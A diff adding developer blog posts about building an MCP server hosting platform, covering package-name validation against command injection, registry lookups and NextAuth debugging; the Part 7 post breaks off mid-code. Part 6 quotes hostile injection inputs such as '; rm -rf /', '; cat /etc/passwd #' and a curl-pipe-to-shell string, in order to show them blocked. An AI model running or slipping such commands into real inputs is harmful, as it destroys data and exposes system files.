+- **Machine startup time**: ~8 seconds (pull image, start container, install package)
+- **First tool call latency**: ~1.2 seconds (initialize MCP server, execute tool)
+- **Subsequent calls**: ~300ms (server already initialized)
+- **Concurrent deployments**: Tested up to 10 (each isolated)
+
+**Bottleneck**: Package installation (npm/pip). Future optimization: Pre-cache popular packages.
+
+## What I Learned
+
+### AI-Generated Code That Worked ✅
+- FastAPI endpoint structure
+- HTTPX client configuration
+- Header forwarding logic
+
+### AI-Generated Code That Failed ❌
+- Private network URL construction (suggested `.fly.dev` instead of `.internal`)
+- `Accept` header omission (didn't read spec carefully)
+- Session cleanup strategy (suggested database, in-memory is fine for MVP)
+
+### Human Expertise Required 🧠
+- Deep MCP spec understanding (protocol version negotiation)
+- Fly.io private networking knowledge
+- Debugging 406 errors (requires understanding mcp-proxy internals)
+- Security: Access token validation
+
+**The pattern**: AI handles HTTP plumbing. Humans handle protocol nuances and platform-specific knowledge.
+
+## Up Next
+
+The platform works! You can deploy MCP servers. Claude can connect. Tools execute.
+
+But there's a glaring security hole: **We're not validating package names**.
+
+A malicious user could submit:
+```
+package: "; rm -rf /"
+```
+
+And we'd execute:
+```bash
+npx -y "; rm -rf /"
+```
+
+Disaster.
+
+Time to build **the Registry & Validation Layer**.
+
+That's Part 6.
+
+---
+
+**Key Commits**:
+- `f1b3e68` - Deploy: Add shared MCP host image + build scripts
+- `f15370c` - Backend: Deploy Fly MCP machines + Streamable HTTP bridge
+- `768d0b3` - Docs: Align docs with Streamable HTTP + deployment flow
+
+**Related Files**:
+- `backend/app/api/mcp_streamable.py` - MCP endpoint implementation
+- `backend/app/services/fly_deployment_service.py` - Fly Machines API
+- `deploy/Dockerfile` - MCP machine image
+
+**Spec Reference**:
+- [MCP Streamable HTTP Specification](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#streamable-http)
+
+**Next Post**: [Part 6: Building the Registry & Validation Layer](06-registry-validation.md)
diff --git a/blog/06-registry-validation.md b/blog/06-registry-validation.md
new file mode 100644
index 0000000..2bf503a
--- /dev/null
+++ b/blog/06-registry-validation.md
@@ -0,0 +1,560 @@
+---
+title: "Part 6: Building the Registry & Validation Layer"
+series: "Catwalk Live Development Journey"
+part: 6
+date: 2025-12-16
+updated: 2025-12-27
+tags: [security, validation, npm, pypi, registry]
+reading_time: "13 min"
+commits_covered: "e41576b...ec955e6"
+---
+
+## The Security Wake-Up Call
+
+December 16, 2025. I'm proud. The platform works. Users can deploy MCP servers. Claude connects. Tools execute.
+
+Then **CodeRabbit** (automated PR review agent) posts a comment:
+
+> **HIGH SEVERITY**: Command injection vulnerability in deployment service.
+>
+> File: `backend/app/services/fly_deployment_service.py`
+> Line: 47
+>
+> The `mcp_package` value from user input is passed directly to shell execution without validation. An attacker could inject shell commands.
+>
+> Example exploit:
+> ```python
+> mcp_package = "; rm -rf / #"
+> # Executes: npx -y ; rm -rf / #
+> ```
+>
+> **Recommendation**: Validate package names against npm/PyPI registries before deployment.
+
+**Oh no.**
+
+I tested it. CodeRabbit was right:
+
+```python
+# Current code (VULNERABLE):
+env = {"MCP_PACKAGE": mcp_package} # mcp_package = user input
+# Machine runs: npx -y $MCP_PACKAGE
+
+# If mcp_package = "; cat /etc/passwd #"
+# Executes: npx -y ; cat /etc/passwd #
+```
+
+**The realization**: AI-generated code had a **critical security vulnerability**. And I almost shipped it to production.
+
+**Lesson 1**: Never trust AI-generated code with security implications. Always validate.
+
+## The Validation Strategy
+
+To prevent command injection, we need to **validate package names before deployment**:
+
+1. **Syntax validation**: Does it look like a valid package name?
+2. **Registry validation**: Does it exist in npm or PyPI?
+3. **Credential validation**: Does the user provide all required env vars?
+
+If any validation fails, reject the deployment **before** creating a machine.
+
+### Package Name Syntax
+
+```python
+# backend/app/services/package_validator.py
+import re
+
+class PackageValidator:
+ """Validate package names before deployment"""
+
+ # npm: @scope/package-name or package-name
+ NPM_PATTERN = r'^(@[\w-]+\/)?[\w-]+(\.[\w-]+)*$'
+
+ # PyPI: package-name (alphanumeric, hyphens, underscores)
+ PYPI_PATTERN = r'^[\w-]+(\.[\w-]+)*$'
+
+ @classmethod
+ def validate_syntax(cls, package: str, runtime: str) -> bool:
+ """
+ Validate package name syntax.
+
+ Args:
+ package: Package name to validate
+ runtime: 'npm' or 'python'
+
+ Returns:
+ True if syntax is valid
+
+ Raises:
+ ValueError if invalid
+ """
+ if runtime == "npm":
+ if not re.match(cls.NPM_PATTERN, package):
+ raise ValueError(
+ f"Invalid npm package name: {package}. "
+ "Expected format: 'package' or '@scope/package'"
+ )
+ elif runtime == "python":
+ if not re.match(cls.PYPI_PATTERN, package):
+ raise ValueError(
+ f"Invalid PyPI package name: {package}. "
+ "Expected format: 'package-name'"
+ )
+ else:
+ raise ValueError(f"Unknown runtime: {runtime}")
+
+ return True
+```
+
+**Why regex**: Whitelisting valid characters prevents shell metacharacters (`;`, `|`, `&`, etc.).
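+
+A quick sanity check of the whitelist against hostile input, using the same pattern as the validator above:
+
+```python
+import re
+
+# Same whitelist as PackageValidator.NPM_PATTERN
+NPM_PATTERN = r'^(@[\w-]+\/)?[\w-]+(\.[\w-]+)*$'
+
+# Legitimate names match
+assert re.match(NPM_PATTERN, "left-pad")
+assert re.match(NPM_PATTERN, "@scope/my-package")
+
+# Anything carrying shell metacharacters cannot match the whitelist
+assert not re.match(NPM_PATTERN, "; rm -rf /")
+assert not re.match(NPM_PATTERN, "pkg && curl evil.sh | sh")
+assert not re.match(NPM_PATTERN, "$(whoami)")
+```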
+
+### Registry Validation
+
+Syntax validation isn't enough. What if an attacker uses a valid-looking name that doesn't exist?
+
+```
+package: "@attacker/malicious-script"
+```
+
+This would fail during `npx` install, but **after** we've created a machine and stored credentials. Bad.
+
+**Solution**: Check if the package exists in npm/PyPI **before** deployment.
+
+```python
+import httpx
+
+class ValidationError(Exception):
+    """Raised when a package fails registry validation"""
+
+class RegistryService:
+    """Validate packages against npm and PyPI registries"""
+
+ NPM_REGISTRY = "https://registry.npmjs.org"
+ PYPI_REGISTRY = "https://pypi.org/pypi"
+
+ def __init__(self):
+ self.client = httpx.AsyncClient(timeout=10.0)
+
+ async def validate_npm_package(self, package: str) -> bool:
+ """
+ Check if package exists in npm registry.
+
+ Args:
+ package: Package name (e.g., '@scope/package' or 'package')
+
+ Returns:
+ True if package exists
+
+ Raises:
+ ValidationError if package not found
+ """
+ url = f"{self.NPM_REGISTRY}/{package}"
+
+ try:
+ response = await self.client.get(url)
+
+ if response.status_code == 200:
+ return True
+ elif response.status_code == 404:
+ raise ValidationError(
+ f"Package '{package}' not found in npm registry"
+ )
+ else:
+ raise ValidationError(
+ f"npm registry error: {response.status_code}"
+ )
+ except httpx.TimeoutException:
+ raise ValidationError("npm registry timeout")
+
+ async def validate_pypi_package(self, package: str) -> bool:
+ """Check if package exists in PyPI registry"""
+ url = f"{self.PYPI_REGISTRY}/{package}/json"
+
+ try:
+ response = await self.client.get(url)
+
+ if response.status_code == 200:
+ return True
+ elif response.status_code == 404:
+ raise ValidationError(
+ f"Package '{package}' not found in PyPI"
+ )
+ else:
+ raise ValidationError(
+ f"PyPI error: {response.status_code}"
+ )
+ except httpx.TimeoutException:
+ raise ValidationError("PyPI timeout")
+```
+
+**Why external validation**:
+- npm and PyPI are authoritative sources
+- If package doesn't exist, deployment will definitely fail
+- Prevents wasted machine creation and credentials storage
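+
+Here's a runnable sketch of that lookup with the registry stubbed out via `httpx.MockTransport`, so it works offline (the handler and package names are illustrative, not the project's actual code):
+
+```python
+import asyncio
+import httpx
+
+class ValidationError(Exception):
+    pass
+
+async def validate_npm_package(client: httpx.AsyncClient, package: str) -> bool:
+    resp = await client.get(f"https://registry.npmjs.org/{package}")
+    if resp.status_code == 200:
+        return True
+    if resp.status_code == 404:
+        raise ValidationError(f"Package '{package}' not found in npm registry")
+    raise ValidationError(f"npm registry error: {resp.status_code}")
+
+def fake_registry(request: httpx.Request) -> httpx.Response:
+    # Pretend only 'left-pad' exists
+    if request.url.path == "/left-pad":
+        return httpx.Response(200, json={"name": "left-pad"})
+    return httpx.Response(404)
+
+async def main():
+    transport = httpx.MockTransport(fake_registry)
+    async with httpx.AsyncClient(transport=transport) as client:
+        ok = await validate_npm_package(client, "left-pad")
+        try:
+            await validate_npm_package(client, "definitely-not-real")
+            err = None
+        except ValidationError as e:
+            err = str(e)
+        return ok, err
+
+ok, err = asyncio.run(main())
+assert ok and "not found" in err
+```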
+
+### Credential Validation
+
+Even if the package is valid, deployment will fail if required credentials are missing.
+
+**Example**: TickTick MCP requires `TICKTICK_TOKEN`. If user doesn't provide it:
+
+```
+Deployment created ✓
+Machine started ✓
+MCP server starts... ERROR: TICKTICK_TOKEN not set
+```
+
+**User experience**: Terrible. They deployed, think it worked, then discover tools don't work.
+
+**Solution**: Validate credentials against analysis schema **before** deployment.
+
+```python
+async def validate_credentials(
+ self,
+ credentials: Dict[str, str],
+ analysis: AnalysisResult
+) -> None:
+ """
+ Validate user-provided credentials against analysis schema.
+
+ Raises:
+ ValidationError if required credentials missing
+ """
+ required_vars = [
+ env_var for env_var in analysis.env_vars
+ if env_var.required
+ ]
+
+ missing = []
+ for env_var in required_vars:
+ if env_var.name not in credentials:
+ missing.append(env_var.name)
+
+ if missing:
+ raise ValidationError(
+ f"Missing required credentials: {', '.join(missing)}",
+ details={"missing": missing}
+ )
+
+ # Optional: Validate credential formats
+ for name, value in credentials.items():
+ env_var = next(
+ (ev for ev in analysis.env_vars if ev.name == name),
+ None
+ )
+
+ if env_var and "URL" in name:
+ # Validate URL format
+ try:
+ httpx.URL(value)
+ except Exception:
+ raise ValidationError(
+ f"Invalid URL for {name}: {value}"
+ )
+```
+
+**Result**: Deployments only proceed if:
+1. Package name syntax is valid
+2. Package exists in registry
+3. All required credentials are provided
+4. Credential formats are correct
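+
+The required-versus-optional distinction is the part that's easy to get wrong; here is that check reduced to a standalone function (`EnvVar` stands in for the analysis schema):
+
+```python
+from dataclasses import dataclass
+from typing import Dict, List
+
+@dataclass
+class EnvVar:
+    name: str
+    required: bool
+
+def missing_credentials(env_vars: List[EnvVar], credentials: Dict[str, str]) -> List[str]:
+    """Names of required env vars the user did not supply."""
+    return [v.name for v in env_vars if v.required and v.name not in credentials]
+
+schema = [EnvVar("TICKTICK_TOKEN", required=True), EnvVar("LOG_LEVEL", required=False)]
+
+assert missing_credentials(schema, {}) == ["TICKTICK_TOKEN"]
+assert missing_credentials(schema, {"TICKTICK_TOKEN": "tok"}) == []  # optional var may be absent
+```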
+
+## The Glama Registry Integration
+
+MCP servers are scattered across GitHub. How do users discover them?
+
+**Enter Glama**: A community registry of MCP servers (like npm search, but for MCP).
+
+**Integration**:
+
+```python
+# backend/app/services/registry_service.py
+class RegistryService:
+    """Search and discover MCP servers via Glama"""
+
+    GLAMA_API = "https://glama.ai/api/mcp/servers"
+
+    def __init__(self):
+        self.client = httpx.AsyncClient(timeout=10.0)
+
+ async def search_servers(self, query: str) -> List[MCPServerInfo]:
+ """
+ Search Glama registry for MCP servers.
+
+ Args:
+ query: Search query (e.g., "ticktick")
+
+ Returns:
+ List of MCP servers matching query
+ """
+ response = await self.client.get(
+ self.GLAMA_API,
+ params={"q": query, "limit": 20}
+ )
+
+ response.raise_for_status()
+ data = response.json()
+
+ return [
+ MCPServerInfo(
+ name=server["name"],
+ description=server["description"],
+ repo_url=server["repository"],
+ package=server["package"],
+ stars=server.get("stars", 0),
+ verified=server.get("verified", False)
+ )
+ for server in data.get("servers", [])
+ ]
+```
+
+**Frontend integration**:
+
+```typescript
+// frontend/app/discover/page.tsx
+export default function DiscoverPage() {
+ const [query, setQuery] = useState("");
+ const [servers, setServers] = useState([]);
+
+ const handleSearch = async () => {
+ const results = await searchMCPServers(query);
+ setServers(results);
+ };
+
+  return (
+    <div>
+      {/* JSX reconstructed; ServerCard is illustrative, original markup was lost in rendering */}
+      <input value={query} onChange={(e) => setQuery(e.target.value)} />
+      <button onClick={handleSearch}>Search</button>
+      {servers.map((server) => (
+        <ServerCard key={server.name} server={server} />
+      ))}
+    </div>
+  );
+}
+```
+
+**User flow**:
+1. User searches "ticktick"
+2. Glama returns MCP servers matching query
+3. User clicks "Deploy" on a server
+4. Analysis pre-filled from Glama data (faster than analyzing GitHub)
+5. Deployment proceeds with validation
+
+**Why this improves UX**: Users don't need to know GitHub URLs. Just search and deploy.
+
+## Runtime Detection
+
+Should users specify "npm" vs "python"? No. **Auto-detect** it.
+
+```python
+import asyncio
+
+async def detect_runtime(package: str) -> str:
+ """
+ Auto-detect runtime from package name.
+
+ Rules:
+ - Starts with '@': npm (scoped package)
+ - Contains '/': npm (@scope/package)
+ - Otherwise: Check both registries
+
+ Returns:
+ 'npm' or 'python'
+ """
+ # Scoped packages are always npm
+ if package.startswith('@') or '/' in package:
+ return "npm"
+
+    # Check both registries concurrently (via the RegistryService above)
+    npm_task = registry_service.validate_npm_package(package)
+    pypi_task = registry_service.validate_pypi_package(package)
+
+ npm_exists, pypi_exists = await asyncio.gather(
+ npm_task, pypi_task,
+ return_exceptions=True
+ )
+
+ if isinstance(npm_exists, Exception) and isinstance(pypi_exists, Exception):
+ raise ValidationError(f"Package '{package}' not found in npm or PyPI")
+
+ # Prefer npm if exists in both (rare but possible)
+ if not isinstance(npm_exists, Exception):
+ return "npm"
+ else:
+ return "python"
+```
+
+**Edge case**: Some packages exist in both npm and PyPI (e.g., `chalk`). Default to npm.
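+
+The tie-breaking logic is easiest to see with the registry calls stubbed out (`check` stands in for the real lookups):
+
+```python
+import asyncio
+
+async def check(registry: str, exists: bool) -> str:
+    if not exists:
+        raise LookupError(f"not in {registry}")
+    return registry
+
+async def detect(npm_exists: bool, pypi_exists: bool) -> str:
+    npm, pypi = await asyncio.gather(
+        check("npm", npm_exists),
+        check("pypi", pypi_exists),
+        return_exceptions=True,  # failures come back as exception objects
+    )
+    if isinstance(npm, Exception) and isinstance(pypi, Exception):
+        raise LookupError("package not found in npm or PyPI")
+    return "npm" if not isinstance(npm, Exception) else "python"
+
+assert asyncio.run(detect(True, True)) == "npm"     # exists in both: prefer npm
+assert asyncio.run(detect(False, True)) == "python"
+```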
+
+## Deployment Flow with Validation
+
+With validation in place, deployment flow becomes:
+
+```python
+@router.post("/api/deployments")
+async def create_deployment(
+    name: str,
+    repo_url: str,
+    credentials: Dict[str, str],
+    background_tasks: BackgroundTasks,  # used for the deploy step below
+):
+ # 1. Retrieve analysis from cache
+ analysis = await analysis_service.get_cached(repo_url)
+ if not analysis:
+ raise HTTPException(400, "Analyze repository first")
+
+ # 2. Validate package syntax
+ package = analysis.package
+    runtime = await detect_runtime(package)
+ package_validator.validate_syntax(package, runtime)
+
+ # 3. Validate package exists in registry
+ if runtime == "npm":
+ await registry_service.validate_npm_package(package)
+ else:
+ await registry_service.validate_pypi_package(package)
+
+ # 4. Validate credentials
+ await validate_credentials(credentials, analysis)
+
+ # 5. Create deployment record
+ deployment = Deployment(
+ name=name,
+ repo_url=repo_url,
+ schedule_config={"mcp_config": analysis.dict()},
+ status="pending"
+ )
+ db.add(deployment)
+ await db.commit()
+
+ # 6. Encrypt credentials
+ encrypted = credential_service.encrypt(credentials)
+ credential_record = Credential(
+ deployment_id=deployment.id,
+ encrypted_data=encrypted
+ )
+ db.add(credential_record)
+ await db.commit()
+
+ # 7. Deploy to Fly.io (background task)
+ background_tasks.add_task(
+ fly_service.create_machine,
+ deployment.id,
+ package,
+ credentials
+ )
+
+ return deployment
+```
+
+**Benefits**:
+- Validation happens **before** deployment
+- Clear error messages at each step
+- No wasted machine creation
+- No credentials stored for invalid packages
+
+## Error Messages: User-Facing vs Internal
+
+**Internal error** (before):
+```
+ValidationError: regex pattern '^(@[\w-]+\/)?[\w-]+(\.[\w-]+)*$' did not match input '; rm -rf /'
+```
+
+**User-facing error** (after):
+```json
+{
+ "error": "invalid_package_name",
+ "message": "The package name contains invalid characters. Package names can only contain letters, numbers, hyphens, and underscores.",
+ "details": {
+ "package": "; rm -rf /",
+ "allowed_format": "'package-name' or '@scope/package-name'"
+ }
+}
+```
+
+**Why better UX**: Users understand the problem and how to fix it.
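+
+One way to keep the internal and user-facing layers separate is a single exception type that carries the machine-readable code, the human message, and the details; a minimal sketch (field names are assumptions, not the project's actual code):
+
+```python
+class ValidationError(Exception):
+    def __init__(self, message: str, error_code: str = "validation_error", details: dict = None):
+        super().__init__(message)
+        self.message = message
+        self.error_code = error_code
+        self.details = details or {}
+
+def to_user_error(exc: ValidationError) -> dict:
+    """Shape an internal exception into the user-facing JSON body."""
+    return {"error": exc.error_code, "message": exc.message, "details": exc.details}
+
+err = ValidationError(
+    "The package name contains invalid characters.",
+    error_code="invalid_package_name",
+    details={"package": "; rm -rf /"},
+)
+
+body = to_user_error(err)
+assert body["error"] == "invalid_package_name"
+assert body["details"]["package"] == "; rm -rf /"
+```
+
+A FastAPI exception handler can then return this dict for every `ValidationError`, so endpoints never leak regex internals.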
+
+## Security Review: CodeRabbit's Feedback
+
+After implementing validation, CodeRabbit reviewed again:
+
+✅ **RESOLVED**: Command injection vulnerability
+- Package names validated with regex whitelist
+- Registry validation prevents non-existent packages
+- Credential validation prevents runtime errors
+
+⚠️ **NEW ISSUE**: Concurrency race condition in registry service
+
+> Multiple concurrent requests to the same package can cause duplicate validation requests. Consider caching validation results.
+
+**The fix**:
+
+```python
+import time
+
+class RegistryService:
+ def __init__(self):
+ self.client = httpx.AsyncClient(timeout=10.0)
+ self._cache = {} # In-memory cache
+ self._cache_ttl = 300 # 5 minutes
+
+ async def validate_npm_package(self, package: str) -> bool:
+ # Check cache first
+ if package in self._cache:
+ cached_at, result = self._cache[package]
+ if time.time() - cached_at < self._cache_ttl:
+ return result
+
+ # Validate
+ result = await self._validate_npm_package_uncached(package)
+
+ # Cache result
+ self._cache[package] = (time.time(), result)
+ return result
+```
+
+**Result**: Validation requests reduced by 80% (most users deploy popular packages).
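+
+One caveat: the plain dict above still lets two concurrent requests for the same package validate twice, since neither sees the other's in-flight lookup. A per-key `asyncio.Lock` closes that gap; a sketch (names are illustrative):
+
+```python
+import asyncio
+import time
+
+class CachedValidator:
+    """TTL cache with per-key locks so concurrent lookups deduplicate."""
+
+    def __init__(self, ttl: float = 300.0):
+        self._ttl = ttl
+        self._cache = {}   # package -> (timestamp, result)
+        self._locks = {}   # package -> asyncio.Lock
+
+    async def validate(self, package, fetch):
+        lock = self._locks.setdefault(package, asyncio.Lock())
+        async with lock:                     # second caller waits here...
+            hit = self._cache.get(package)
+            if hit and time.time() - hit[0] < self._ttl:
+                return hit[1]                # ...and gets the cached result
+            result = await fetch(package)    # e.g. the real registry lookup
+            self._cache[package] = (time.time(), result)
+            return result
+
+calls = 0
+
+async def fake_fetch(package):
+    global calls
+    calls += 1
+    await asyncio.sleep(0.01)  # simulate registry latency
+    return True
+
+async def main():
+    v = CachedValidator()
+    await asyncio.gather(*(v.validate("left-pad", fake_fetch) for _ in range(10)))
+    return calls
+
+assert asyncio.run(main()) == 1  # ten concurrent validations, one registry call
+```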
+
+## What I Learned
+
+### Where AI Helped ✅
+- Regex patterns for package name validation
+- HTTP client setup for registry APIs
+- Error message structuring
+
+### Where AI Failed ❌
+- **Didn't think about security** - AI generated the vulnerable code
+- **Didn't consider concurrency** - Race conditions in validation
+- **Over-complicated** - AI suggested database for caching (overkill)
+
+### Human Expertise Required 🧠
+- **Threat modeling**: What could go wrong?
+- **Security validation**: Is this code safe to execute?
+- **UX decisions**: How should validation errors appear?
+- **Performance**: Do we need caching? Where?
+
+**The pattern**: AI writes code. Humans think about what the code **enables attackers to do**.
+
+## Up Next
+
+The platform is now secure:
+- ✅ Package names validated
+- ✅ Registry checks prevent non-existent packages
+- ✅ Credentials validated before deployment
+- ✅ Clear error messages
+
+But there's another problem: **Users can't actually access the platform**.
+
+There's no authentication. No user accounts. No way to manage API keys.
+
+Time to build **authentication**.
+
+That's Part 7: The Authentication Nightmare.
+
+Spoiler: This one nearly broke me.
+
+---
+
+**Key Commits**:
+- `e41576b` - Introduce Glama MCP registry search and dynamic form generation
+- `ec955e6` - Add credential and package validation services
+- `7c2fa06` - Implement registry service and API
+
+**Related Files**:
+- `backend/app/services/package_validator.py` - Package name validation
+- `backend/app/services/registry_service.py` - npm/PyPI validation
+- `backend/app/api/deployments.py` - Validation integration
+
+**Security Resources**:
+- CodeRabbit security review comments
+- OWASP Top 10: Injection vulnerabilities
+
+**Next Post**: [Part 7: The Authentication Nightmare](07-authentication-crisis.md)
diff --git a/blog/07-authentication-crisis.md b/blog/07-authentication-crisis.md
new file mode 100644
index 0000000..c13fc4b
--- /dev/null
+++ b/blog/07-authentication-crisis.md
@@ -0,0 +1,583 @@
+---
+title: "Part 7: The Authentication Nightmare"
+series: "Catwalk Live Development Journey"
+part: 7
+date: 2025-12-20
+updated: 2025-12-27
+tags: [authentication, jwt, nextauth, debugging, crisis]
+reading_time: "15 min"
+commits_covered: "068dc28...a8dfde6"
+---
+
+## The Dark Before the Dawn
+
+December 20, 2025. The platform works beautifully:
+- ✅ Analysis engine extracts MCP config
+- ✅ Validation prevents security holes
+- ✅ Deployments create Fly machines
+- ✅ Streamable HTTP proxies to MCP servers
+- ✅ Claude successfully calls tools
+
+There's just one tiny problem: **Anyone can deploy anything**.
+
+No user accounts. No authentication. No authorization. Just... open endpoints.
+
+Time to fix that. How hard could authentication be?
+
+## Attempt 1: NextAuth.js Setup
+
+AI (Claude Code) suggested NextAuth.js (now "Auth.js"):
+
+```typescript
+// frontend/auth.ts
+import NextAuth from "next-auth"
+import Google from "next-auth/providers/google"
+
+export const { handlers, auth, signIn, signOut } = NextAuth({
+ providers: [
+ Google({
+ clientId: process.env.GOOGLE_CLIENT_ID!,
+ clientSecret: process.env.GOOGLE_CLIENT_SECRET!,
+ })
+ ],
+ callbacks: {
+ async signIn({ user, account }) {
+ // Sync user to backend database
+ // TODO: Implement this
+ return true
+ }
+ }
+})
+```
+
+Deployed. Sign-in modal works. Google OAuth succeeds. User sees their email in the navbar.
+
+**Perfect! Ship it.**
+
+## The 401 Error Wall
+
+December 20, 3 PM. First real test: create a deployment.
+
+```
+POST /api/deployments
+Authorization: Bearer <jwt>
+
+Response: 401 Unauthorized
+```
+
+**What?** The user is signed in. The JWT is in the header. Why 401?
+
+Checked backend logs:
+
+```
+2025-12-20T15:23:45Z [error] JWT verification failed: Invalid signature
+```
+
+**The problem**: Frontend generates JWT. Backend verifies JWT. They're using **different secrets**.
+
+**Frontend** (`.env.local`):
+```
+AUTH_SECRET=abc123...
+```
+
+**Backend** (Fly.io secrets):
+```
+AUTH_SECRET=xyz789...
+```
+
+**The fix**: Make sure secrets **match exactly**.
+
+```bash
+# Generate secret once
+AUTH_SECRET=$(openssl rand -base64 32)
+
+# Set on backend
+fly secrets set AUTH_SECRET="$AUTH_SECRET" --app catwalk-backend
+
+# Set on frontend (.env.local)
+echo "AUTH_SECRET=\"$AUTH_SECRET\"" >> frontend/.env.local
+```
+
+Redeployed. Tried again:
+
+```
+POST /api/deployments
+Authorization: Bearer <jwt>
+
+Response: 401 Unauthorized
+```
+
+**Still broken.** Different error:
+
+```
+2025-12-20T16:05:12Z [error] User not found in database: user@example.com
+```
+
+## The Silent User Sync Failure
+
+**What happened**: User signed in via Google OAuth. Frontend has user info. But backend **has no record of this user**.
+
+**Why**: The `signIn` callback that should sync users to the backend... wasn't implemented.
+
+**AI's generated code**:
+
+```typescript
+async signIn({ user, account }) {
+ // TODO: Sync user to backend database
+ return true
+}
+```
+
+Literally a TODO. **And I shipped it.**
+
+**Lesson 1**: Never skip TODOs. Always verify AI-generated code is complete.
+
+**The fix**: Implement user sync.
+
+```typescript
+// frontend/auth.ts
+export const { handlers, auth, signIn, signOut } = NextAuth({
+ providers: [Google(...)],
+ callbacks: {
+ async signIn({ user, account }) {
+ // Sync user to backend
+ try {
+ const response = await fetch(
+ `${process.env.NEXT_PUBLIC_BACKEND_URL}/api/auth/sync-user`,
+ {
+ method: "POST",
+ headers: {
+ "Content-Type": "application/json",
+ "X-Auth-Secret": process.env.AUTH_SYNC_SECRET!
+ },
+ body: JSON.stringify({
+ email: user.email,
+ name: user.name,
+ provider: account.provider,
+ provider_id: account.providerAccountId
+ })
+ }
+ );
+
+ if (!response.ok) {
+ console.error("User sync failed:", await response.text());
+ return false; // Block sign-in if sync fails
+ }
+
+ return true;
+ } catch (error) {
+ console.error("User sync error:", error);
+ return false;
+ }
+ }
+ }
+})
+```
+
+**Backend endpoint**:
+
+```python
+# backend/app/api/auth.py
+from fastapi import APIRouter, HTTPException, Header
+from pydantic import BaseModel
+
+router = APIRouter()
+
+class SyncUserRequest(BaseModel):
+    # A Pydantic model makes FastAPI read these fields from the JSON body;
+    # bare str parameters would be treated as query parameters.
+    email: str
+    name: str
+    provider: str
+    provider_id: str
+
+@router.post("/auth/sync-user")
+async def sync_user(
+    data: SyncUserRequest,
+    x_auth_secret: str = Header(None, alias="X-Auth-Secret")
+):
+    """
+    Sync user from frontend to backend database.
+
+    Called by NextAuth.js after successful OAuth sign-in.
+
+    Security: Protected by AUTH_SYNC_SECRET header.
+    """
+
+    # Verify sync secret
+    if x_auth_secret != settings.AUTH_SYNC_SECRET:
+        raise HTTPException(403, "Invalid auth sync secret")
+
+    # Create or update user
+    async with get_session() as db:
+        result = await db.execute(
+            select(User).where(User.email == data.email)
+        )
+        user = result.scalar_one_or_none()
+
+        if not user:
+            # Create new user
+            user = User(
+                email=data.email,
+                name=data.name,
+                provider=data.provider,
+                provider_id=data.provider_id
+            )
+            db.add(user)
+        else:
+            # Update existing user
+            user.name = data.name
+
+        await db.commit()
+        await db.refresh(user)  # reload generated fields (id) after commit
+        return {"id": str(user.id), "email": user.email}
+```
+
+Deployed. Signed in. Checked logs:
+
+```
+2025-12-20T17:30:22Z [info] User synced: user@example.com
+```
+
+**Success!** User now exists in database.
+
+Tried creating a deployment:
+
+```
+POST /api/deployments
+Authorization: Bearer <jwt>
+
+Response: 401 Unauthorized
+```
+
+**STILL BROKEN.**
+
+## The Great Secret Confusion
+
+December 20, 6 PM. I've been debugging for three hours. The error:
+
+```
+2025-12-20T18:45:33Z [error] JWT verification failed: Invalid signature
+```
+
+But the `AUTH_SECRET` matches! I've checked 10 times!
+
+**Then I noticed**: Two different secrets in the environment variables.
+
+**Frontend `.env.local`**:
+```
+AUTH_SECRET=abc123...
+AUTH_SYNC_SECRET=def456...
+```
+
+**Backend Fly.io**:
+```
+AUTH_SECRET=xyz789...
+AUTH_SYNC_SECRET=def456...
+```
+
+**The problem**: `AUTH_SECRET` still didn't match. I had set `AUTH_SYNC_SECRET` correctly but never updated `AUTH_SECRET` on the backend.
+
+**The confusion**: Two secrets with similar names:
+1. **`AUTH_SECRET`**: Signs/verifies JWT tokens for API authentication
+2. **`AUTH_SYNC_SECRET`**: Secures the `/auth/sync-user` endpoint
+
+**Why two secrets?**:
+- `AUTH_SECRET` must be shared between frontend and backend (JWT verification)
+- `AUTH_SYNC_SECRET` is server-to-server only (prevents external calls to sync endpoint)
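+
+The "Invalid signature" failure is easy to reproduce with a hand-rolled HS256 round trip (stdlib only; this demonstrates the mechanism, real code should use a JWT library):
+
+```python
+import base64
+import hashlib
+import hmac
+import json
+
+def b64url(data: bytes) -> str:
+    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
+
+def sign(payload: dict, secret: str) -> str:
+    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
+    body = b64url(json.dumps(payload).encode())
+    msg = f"{header}.{body}".encode()
+    sig = b64url(hmac.new(secret.encode(), msg, hashlib.sha256).digest())
+    return f"{header}.{body}.{sig}"
+
+def verify(token: str, secret: str) -> bool:
+    header, body, sig = token.split(".")
+    msg = f"{header}.{body}".encode()
+    expected = b64url(hmac.new(secret.encode(), msg, hashlib.sha256).digest())
+    return hmac.compare_digest(sig, expected)
+
+token = sign({"userId": "42"}, "abc123")
+assert verify(token, "abc123")       # frontend and backend share the secret: valid
+assert not verify(token, "xyz789")   # mismatched secrets: "Invalid signature"
+```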
+
+**The fix** (for real this time):
+
+```bash
+# Generate BOTH secrets
+AUTH_SECRET=$(openssl rand -base64 32)
+AUTH_SYNC_SECRET=$(openssl rand -base64 32)
+
+# Set on backend
+fly secrets set \
+ AUTH_SECRET="$AUTH_SECRET" \
+ AUTH_SYNC_SECRET="$AUTH_SYNC_SECRET" \
+ --app catwalk-backend
+
+# Set on frontend
+cat >> frontend/.env.local <<EOF
+AUTH_SECRET="$AUTH_SECRET"
+AUTH_SYNC_SECRET="$AUTH_SYNC_SECRET"
+EOF
+```
+
+Redeployed. Tried creating a deployment one more time:
+
+```
+POST /api/deployments
+Authorization: Bearer <jwt>
+
+Response: 201 Created
+{
+ "id": "...",
+ "name": "My TickTick",
+ "status": "deploying"
+}
+```
+
+**IT WORKS!** After 4 hours of debugging.
+
+## The Authentication Flow (Final)
+
+Here's the complete flow that finally worked:
+
+### Step 1: User Signs In
+
+```
+User clicks "Sign in with Google"
+ ↓
+NextAuth.js redirects to Google OAuth
+ ↓
+User authorizes application
+ ↓
+Google redirects back to /api/auth/callback/google
+ ↓
+NextAuth.js signIn callback fires
+```
+
+### Step 2: User Sync
+
+```typescript
+// frontend/auth.ts signIn callback
+async signIn({ user, account }) {
+ // POST to backend /api/auth/sync-user
+ // Headers: X-Auth-Secret (server-to-server auth)
+ // Body: { email, name, provider, provider_id }
+
+ // Backend creates/updates user in database
+ // Returns user ID
+
+ return true; // Allow sign-in
+}
+```
+
+### Step 3: JWT Token Generation
+
+```typescript
+// frontend/auth.ts jwt callback
+async jwt({ token, user }) {
+ // Add user ID to JWT payload
+ if (user) {
+ token.userId = user.id;
+ }
+ return token;
+}
+```
+
+### Step 4: API Request with JWT
+
+```typescript
+// frontend/lib/api.ts
